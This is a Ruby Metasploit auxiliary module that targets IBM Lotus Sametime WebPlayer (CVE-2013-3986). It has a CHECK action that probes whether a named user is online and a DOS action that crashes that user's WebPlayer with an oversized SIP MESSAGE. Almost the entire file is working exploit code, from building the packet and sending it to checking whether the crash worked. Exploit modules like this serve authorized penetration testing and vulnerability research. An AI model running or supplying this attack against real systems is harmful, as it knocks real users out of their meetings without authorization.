##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
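class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM Lotus Sametime WebPlayer DoS',
        'Description' => %q{
          This module exploits a known flaw in the IBM Lotus Sametime WebPlayer
          version 8.5.2.1392 (and prior) to cause a denial of service condition
          against specific users. For this module to function the target user
          must be actively logged into the IBM Lotus Sametime server and have
          the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a
          browser extension. The user should have the WebPlayer plug-in active
          (i.e. be in a Sametime Audio/Video meeting) for this DoS to work correctly.
        },
        'Author' => [
          'Chris John Riley', # Vulnerability discovery
          'kicks4kittens' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          [
            'DOS',
            {
              'Description' => 'Cause a Denial Of Service condition against a connected user'
            }
          ],
          [
            'CHECK',
            {
              'Description' => 'Checking if targeted user is online'
            }
          ]
        ],
        'DefaultAction' => 'DOS',
        'References' => [
          [ 'CVE', '2013-3986' ],
          [ 'OSVDB', '99552' ],
          [ 'BID', '63611'],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],
          [ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]
        ],
        'DisclosureDate' => '2013-11-07',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(5060),
        OptAddress.new('RHOST', [true, 'The Sametime Media Server']),
        OptString.new('SIPURI', [
          true,
          'The SIP URI of the user to be targeted',
          '<target_email_address>@<sametime_media_server_FQDN>'
        ]),
        OptInt.new('TIMEOUT', [ true, 'Set specific response timeout', 0])
      ]
    )
  end

  # Normalise the SIPURI option into the bare "user@host" form used by
  # create_message, which prepends "sip:WebAVClient-" itself. Both prefixes
  # are stripped case-insensitively so that a user may paste the full URI.
  def setup
    @sipuri = datastore['SIPURI']
    # drop an optional "sip:" scheme
    @sipuri = @sipuri.sub(/\Asip:/i, '')
    # drop an optional "WebAVClient-" prefix
    @sipuri = @sipuri.sub(/\AWebAVClient-/i, '')
  end

  # Entry point: runs the selected action (CHECK or DOS). The DOS action only
  # proceeds when check_user reports the target as online.
  def run
    # inform user of action currently selected
    print_status("Action: #{action.name} selected")

    # CHECK action
    if action.name == 'CHECK'
      print_status("Checking if user #{@sipuri} is online")
      if check_user
        print_good('User online')
      else
        print_status('User offline')
      end
      return
    end

    # DOS action
    print_status("Checking if user #{@sipuri} is online")
    check_result = check_user

    if check_result == false
      print_error('User is already offline... Exiting...')
      return
    end

    # only reached for the DOS action when the target user is online
    print_status("Targeting user: #{@sipuri}...")
    dos_result = dos_user

    if dos_result
      print_good('User is offline, DoS was successful')
    else
      print_error('User is still online')
    end
  end

  # Sends the oversized SIP MESSAGE and interprets the server's reply.
  #
  # @return [Boolean] true when the reply (or lack of one) indicates the user
  #   is no longer responding; false only when the server answers "200 OK".
  def dos_user
    length = 12000 # enough to overflow the end of allocated memory
    msg = create_message(length)
    res = send_msg(msg)

    case res
    when nil
      vprint_good("User #{@sipuri} is not responding")
      true
    when /430 Flow Failed/i
      vprint_good('DoS packet successful. Response received (430 Flow Failed)')
      vprint_good("User #{@sipuri} is no longer responding")
      true
    when /404 Not Found/i
      vprint_error('DoS packet appears successful. Response received (404 Not Found)')
      vprint_status('User appears to be currently offline or not in a Sametime video session')
      true
    when /200 OK/i
      # NOTE: the original used the misspelled vrint_error/vrint_status here,
      # which raised NoMethodError on every "200 OK" reply.
      vprint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
      vprint_status("#{peer} - Check user is running an affected version of IBM Lotus Sametime WebPlayer")
      false
    else
      vprint_status('Unexpected response')
      true
    end
  end

  # used to check the user is logged into Sametime and after DoS to check success
  #
  # Sends a short (2-digit random length) SIP MESSAGE and maps the common
  # reply codes onto an online/offline verdict.
  #
  # @return [Boolean] true only when the server answers "200 OK"
  def check_user
    length = Rex::Text.rand_text_numeric(2) # just enough to check response
    msg = create_message(length)
    res = send_msg(msg)

    # check response for current user status - common return codes
    case res
    when nil
      vprint_error('No response')
      false
    when /430 Flow Failed/i
      vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")
      false
    when /404 Not Found/i
      vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")
      false
    when /200 OK/i
      vprint_good("User #{@sipuri} is online")
      true
    else
      vprint_error('Unknown server response')
      false
    end
  end

  # Builds a SIP MESSAGE request addressed to sip:WebAVClient-<SIPURI> whose
  # body is +length+ random alphanumeric bytes.
  #
  # @param length [Integer, String] body length; coerced with to_i because
  #   check_user passes a numeric String
  # @return [String] the raw request, headers terminated by CRLF and
  #   separated from the body by a blank line
  def create_message(length)
    # create SIP MESSAGE of specified length
    vprint_status("Creating SIP MESSAGE packet #{length} bytes long")

    source_user = Rex::Text.rand_text_alphanumeric(1..8)
    source_host = Rex::Socket.source_address(datastore['RHOST'])
    src = "#{source_host}:#{datastore['RPORT']}"
    cseq = Rex::Text.rand_text_numeric(3)
    message_text = Rex::Text.rand_text_alphanumeric(length.to_i)
    branch = Rex::Text.rand_text_alphanumeric(7)
    via_suffix = format('%.8x', rand(0x100000000))

    # setup SIP message in the correct format expected by the server
    data = "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0\r\n"
    data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{via_suffix};rport;alias\r\n"
    data << "Max-Forwards: 80\r\n"
    data << "To: sip:WebAVClient-#{@sipuri}\r\n"
    data << "From: sip:#{source_user}@#{src};tag=70c00e8c\r\n"
    data << "Call-ID: #{rand(0x100000000)}@#{source_host}\r\n"
    data << "CSeq: #{cseq} MESSAGE\r\n"
    data << "Content-Type: text/plain;charset=utf-8\r\n"
    data << "User-Agent: #{source_user}\r\n"
    data << "Content-Length: #{message_text.length}\r\n\r\n"
    data << message_text

    data
  end

  # Reads up to +length+ bytes from +sock+, honouring the TIMEOUT option when
  # it is set to a positive value and otherwise using get_once's default.
  #
  # @param sock [Rex::Socket] connected socket
  # @param length [Integer] maximum bytes to read
  # @return [String, nil] whatever get_once returns
  def timing_get_once(sock, length)
    timeout = datastore['TIMEOUT']
    if timeout && timeout > 0
      sock.get_once(length, timeout)
    else
      sock.get_once(length)
    end
  end

  # Connects to RHOST:RPORT, writes +msg+ and returns the first response read.
  #
  # @param msg [String] SIP request built by create_message
  # @return [String, nil] the raw reply, or nil when the connection fails or
  #   is reset (a reset is reported as a successful DoS)
  def send_msg(msg)
    s = connect
    # send message and store response
    begin
      s.put(msg + "\r\n\r\n")
    rescue StandardError => e
      # best effort: report the failed write but still attempt the read,
      # the original silently ignored this error
      vprint_error("Failed to send SIP MESSAGE: #{e.class}")
    end
    # read response; a lone CRLF is not the reply, so read once more
    res = timing_get_once(s, 25)
    res = timing_get_once(s, 25) if res == "\r\n"
    res
  rescue ::Rex::ConnectionRefused
    print_status('Unable to connect')
    nil
  rescue ::Errno::ECONNRESET
    print_good('DoS packet successful, host not responding.')
    nil
  rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    print_status("Couldn't connect")
    nil
  ensure
    # disconnect socket if still open
    disconnect if s
  end
end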